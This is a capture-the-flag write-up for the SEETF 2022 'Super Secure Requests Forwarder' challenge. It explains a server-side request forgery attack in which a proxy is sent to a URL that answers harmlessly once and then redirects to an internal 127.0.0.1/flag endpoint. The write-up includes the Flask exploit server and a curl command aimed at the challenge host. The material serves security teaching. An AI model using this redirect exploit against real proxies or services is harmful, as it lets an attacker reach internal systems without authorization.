Social Engineering Experts CTF 2022: Super Secure Requests Forwarder
TL;DR
- The service blindly forwards requests to user-supplied URLs.
- It assumes a URL is safe after a single benign request.
- Host a server that behaves differently on subsequent requests.
- First response looks harmless, second response issues a redirect to
127.0.0.1. - The proxy follows the redirect and fetches the internal
/flagendpoint.
Video Walkthrough
Description
Hide your IP address and take back control of your privacy! Visit websites through our super secure proxy.
Solution
from flask import Flask, redirect, request
# flask run
# ngrok http 5000
# curl -X POST -d "url=http://c0ac-81-103-153-174.ngrok.io/exploit" http://ssrf.chall.seetf.sg:1337/
app = Flask(__name__)
check = True
@app.route("/")
def index():
return "<a href='https://www.youtube.com/c/CryptoCat23'>👀</a>"
@app.route("/exploit", methods=['GET', 'POST'])
def handle():
global check
if check: # First request = benign
check = False
return "First request is benign, why wouldn't the second be?!"
else: # Second request = malicious
check = True
return redirect("http://127.0.0.1/flag", code=302)